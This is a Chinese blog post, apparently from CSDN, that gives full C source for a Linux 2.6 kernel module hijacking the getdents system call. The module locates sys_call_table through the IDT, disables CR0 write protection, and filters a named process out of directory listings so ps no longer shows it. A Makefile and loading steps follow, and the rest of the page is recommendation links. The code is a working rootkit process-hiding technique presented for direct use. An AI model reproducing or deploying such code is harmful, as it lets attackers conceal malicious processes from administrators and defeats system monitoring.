linux系统调用劫持隐藏进程,Linux2.6内核中劫持系统调用隐藏进程

最新推荐文章于 2021-08-26 16:12:58 发布
最新推荐文章于 2021-08-26 16:12:58 发布
阅读量70 收藏
点赞数
文章标签: linux系统调用劫持隐藏进程

//#include #define CALLOFF 100

//使用模块参数来定义需要隐藏的进程名

int orig_cr0;

char psname[10]="looptest";

char *processname=psname;

//module_param(processname, charp, 0);

struct {

unsigned short limit;

unsigned int base;

} __attribute__ ((packed)) idtr;

struct {

unsigned short off1;

unsigned short sel;

unsigned char none,flags;

unsigned short off2;

} __attribute__ ((packed)) * idt;

struct linux_dirent{

unsigned long     d_ino;

unsigned long     d_off;

unsigned short    d_reclen;

char    d_name[1];

};

void** sys_call_table;

unsigned int clear_and_return_cr0(void)

{

unsigned int cr0 = 0;

unsigned int ret;

asm volatile ("movl %%cr0, %%eax"

: "=a"(cr0)

);

ret = cr0;

/*clear the 20th bit of CR0,*/

cr0 &= 0xfffeffff;

asm volatile ("movl %%eax, %%cr0"

:

: "a"(cr0)

);

return ret;

}

void setback_cr0(unsigned int val)

{

asm volatile ("movl %%eax, %%cr0"

:

: "a"(val)

);

}

asmlinkage long (*orig_getdents)(unsigned int fd,

struct linux_dirent __user *dirp, unsigned int count);

char * findoffset(char *start)

{

char *p;

for (p = start; p < start + CALLOFF; p++)

if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85')

return p;

return NULL;

}

int myatoi(char *str)

{

int res = 0;

int mul = 1;

char *ptr;

for (ptr = str + strlen(str) - 1; ptr >= str; ptr--)

{

if (*ptr < '0' || *ptr > '9')

return (-1);

res += (*ptr - '0') * mul;

mul *= 10;

}

if(res>0 && res< 9999)

printk(KERN_INFO "pid=%d,",res);

printk("\n");

return (res);

}

struct task_struct *get_task(pid_t pid)

{

struct task_struct *p = get_current(),*entry=NULL;

list_for_each_entry(entry,&(p->tasks),tasks)

{

if(entry->pid == pid)

{

printk("pid found=%d\n",entry->pid);

return entry;

}

else

{

//    printk(KERN_INFO "pid=%d not found\n",pid);

}

}

return NULL;

}

static inline char *get_name(struct task_struct *p, char *buf)

{

int i;

char *name;

name = p->comm;

i = sizeof(p->comm);

do {

unsigned char c = *name;

name++;

i--;

*buf = c;

if (!c)

break;

if (c == '\\') {

buf[1] = c;

buf += 2;

continue;

}

if (c == '\n')

{

buf[0] = '\\';

buf[1] = 'n';

buf += 2;

continue;

}

buf++;

}

while (i);

*buf = '\n';

return buf + 1;

}

int get_process(pid_t pid)

{

struct task_struct *task = get_task(pid);

//    char *buffer[64] = {0};

char buffer[64];

if (task)

{

get_name(task, buffer);

//    if(pid>0 && pid<9999)

//    printk(KERN_INFO "task name=%s\n",*buffer);

if(strstr(buffer,processname))

return 1;

else

return 0;

}

else

return 0;

}

asmlinkage long hacked_getdents(unsigned int fd,

struct linux_dirent __user *dirp, unsigned int count)

{

//added by lsc for process

long value;

//    struct inode *dinode;

unsigned short len = 0;

unsigned short tlen = 0;

//    struct linux_dirent *mydir = NULL;

//end

//在这里调用一下sys_getdents,得到返回的结果

value = (*orig_getdents) (fd, dirp, count);

tlen = value;

//遍历得到的目录列表

while(tlen > 0)

{

len = dirp->d_reclen;

tlen = tlen - len;

printk("%s\n",dirp->d_name);

if(get_process(myatoi(dirp->d_name)) )

{

printk("find process\n");

//发现匹配的进程,调用memmove将这条进程覆盖掉

memmove(dirp, (char *) dirp + dirp->d_reclen, tlen);

value = value - len;

printk(KERN_INFO "hide successful.\n");

}

if(tlen)

dirp = (struct linux_dirent *) ((char *)dirp + dirp->d_reclen);

}

printk(KERN_INFO "finished hacked_getdents.\n");

return value;

}

void **get_sct_addr(void)

{

unsigned sys_call_off;

unsigned sct = 0;

char *p;

asm("sidt %0":"=m"(idtr));

idt = (void *) (idtr.base + 8 * 0x80);

sys_call_off = (idt->off2 << 16) | idt->off1;

if ((p = findoffset((char *) sys_call_off)))

sct = *(unsigned *) (p + 3);

return ((void **)sct);

}

static int filter_init(void)

{

//得到sys_call_table的偏移地址

sys_call_table = get_sct_addr();

if (!sys_call_table)

{

printk("get_act_addr(): NULL...\n");

return 0;

}

else

printk("sct: 0x%x\n", (unsigned int)sys_call_table);

//将sys_call_table中注册的系统调用sys_getdents替换成我们自己的函数hack_getdents

orig_getdents = sys_call_table[__NR_getdents];

orig_cr0 = clear_and_return_cr0();

sys_call_table[__NR_getdents] = hacked_getdents;

setback_cr0(orig_cr0);

printk(KERN_INFO "hideps: module loaded.\n");

return 0;

}

static void filter_exit(void)

{

orig_cr0 = clear_and_return_cr0();

if (sys_call_table)

sys_call_table[__NR_getdents] = orig_getdents;

setback_cr0(orig_cr0);

printk(KERN_INFO "hideps: module removed\n");

}

module_init(filter_init);

module_exit(filter_exit);

MODULE_LICENSE("GPL");

makefile文件如下:

obj-m   :=hideps.o

EXTRA_CFLAGS := -Dsymname=sys_call_table

KDIR   := /lib/modules/$(shell uname -r)/build

PWD   := $(shell pwd)

default:

$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

clean:

$(RM) -rf .*.cmd *.mod.c *.o *.ko .tmp*

编写一个测试程序looptest.c,如下:

#includeint main(void)

{

while(1);

return 0;

}

编译该测试程序,#gcc looptest.c -o looptest

并将该程序在后台运行,然后insmod 驱动模块hideps.ko,然后输入ps查看进程,可发现,looptest进程看不到了....

weixin_39551188
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux编写内核模块新增系统调用遍历进程树--基于Ubuntu20.04.03LTS实现
02-18
实验目标:在Linux内核增加一个系统调用,并编写对应的linux应用程序。利用该系统调用能够遍历系统当前所有进程的任务描述符,并按进程父子关系将这些描述符所对应的进程id(PID)组织成树形结构显示。 实验环境:...
Linux内核分析5:分析system_call断处理过程
絮雨清风
03-23 2045
席金玉+ 原创作品转载请注明出处 + 《Linux内核分析》MOOC课程 一、系统调用步骤 程序调用库的封装函数;调用断int $0x80进入内核;在内核首先执行system_call()函数,接着根据系统调用号在系统调用查找到对应的系统调用服务例程;执行该服务例程;执行完毕后,转入ret_from_sys_call例程,从系统调用返回。 二、系统调用分析       系
linux系统下的各种hook方式\Linux内核hook系统调用
热门推荐
西京刀客
08-26 1万+
文章目录一、linux系统下的各种hook方式1. 函数指针hook2. 动态库劫持3. Linux系统调用劫持 hook4. 堆栈式文件系统5. LSM二、Linux内核hook系统调用 一、linux系统下的各种hook方式 在计算机,基本所有的软件程序都可以通过hook方式进行行为拦截,hook方式就是改变原始的执行流, Linux平台上常见的拦截: 修改函数指针。 用户态动态库拦截。 内核系统调用拦截。 堆栈式文件系统拦截。 LSM(Linux Security Modules) 1. 函数
Linux 2.6内核通过模块获取sys_call_table地址的方法
11-06 1216
朱熹之 2007-1-4 09:09
linux调度器(二)-2.6内核分析
鲲的博客
07-02 207
2.4内核调度器存在的问题 接上篇文章 linux调度器(一)-2.4内核分析 介绍,2.4内核存在以下问题: SMP架构,所有CPU共享一个可运行队列,访问效率低下; 每次调度时从可运行队列选择一个线程执行的时候都需要遍历一次链表, 时间复杂度O(n); 所有任务的时间片用完时,要遍历一遍链表重新赋值时间片,时间复杂度O(n); 内核态不可抢占; 2.6内核调度器就是针对这些问题一一解决...
sys_getdents
anzhuangguai的专栏
10-14 3390
 http://linux.die.net/man/2/getdents int getdents(unsigned int fd, struct linux_dirent *dirp,              unsigned int count); fd指目录文件描述符。可以用sys_open创建。 dirp指目录信息,其大小由第3个参数指定,
linux系统调用实验一条龙.rar
12-31
题目:在Linux内核增加一个系统调用,并编写对应的Linux应用程序。利用该系统调用能够遍历系统当前所有进程的任务描述符,并按进程父子关系将这些描述符所对应的进程id(PID)组织成树形结构显示。 说明:代码有...
Linux内核增加一个系统调用.pdf
07-13
Linux内核增加一个系统调用.pdfLinux内核增加一个系统调用.pdfLinux内核增加一个系统调用.pdfLinux内核增加一个系统调用.pdfLinux内核增加一个系统调用.pdfLinux内核增加一个系统调用.pdf
Linux获取某个进程系统调用以及参数(故障排查案例)
01-10
当一个程序发生故障时,有时候想通过了解该进程正在执行的系统调用来排查问题。通常可以用 strace 来跟踪。但是当进程已经处于 D 状态(uninterruptible sleep)时,strace 也帮不上忙。这时候可以通过 代码如下:cat...
基于C语言的Linux内核编译及添加系统调用.zip
10-26
为了在内核态下运行,本实验针对Linux内核进行修改,增加自定义系统调用函数实现用户态程序对任意进程的nice值进行修改或者读取来进行测试。详细介绍参考:...
Linux后门系列--由浅入深sk13完全分析(缩水版)
09-13 747
创建时间:2007-09-11文章属性:原创文章提交:wzt (wzt_at_xsec.org)Linux后门系列--由浅入深sk13完全分析(缩水版)作者 wzt联系方式 [email protected]个人网站 http://tthacker.cublog.cn http://xsec.org本文首发《黑客防线》第八期,本文在《黑防》里有更详细更细致的描述,特别适合刚入门的小嘿嘿,因为网上发布的这个文
智慧学院智能化项目规划设计方案PPT(45页).pptx
05-03
智慧学院智能化项目规划设计方案PPT(45页).pptx
AO工艺设计计算(全).xls
05-03
污水处理计算书
ASP+ACCESS动态网站设计与制作(源代码+设计说明书).zip
05-03
ASP+ACCESS动态网站设计与制作(源代码+设计说明书).zip
基于matlab实现的二维渗流代码,用于模拟在二维条件下,格点所受碰撞的次数.rar
最新发布
05-03
基于matlab实现的二维渗流代码,用于模拟在二维条件下,格点所受碰撞的次数.rar
基于matlab实现可实现脉冲编码调制,模拟信号的数字传输:抽样、量化、编码.rar
05-03
基于matlab实现可实现脉冲编码调制,模拟信号的数字传输:抽样、量化、编码.rar
ASP+access网上购物系统(设计说明书+源代码).zip
05-03
ASP+access网上购物系统(设计说明书+源代码).zip
Screenshot_20240503_054519.jpg
05-03
Screenshot_20240503_054519.jpg
Linux 系统调用fork()是怎样创建进程
06-12
调用fork()系统调用时,Linux内核会创建一个新的进程(称为子进程),该进程与原进程(称为父进程)几乎完全相同。新进程的代码、数据、堆栈和其他内存段都是原进程的完全拷贝。新进程的唯一区别在于它有一个新的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值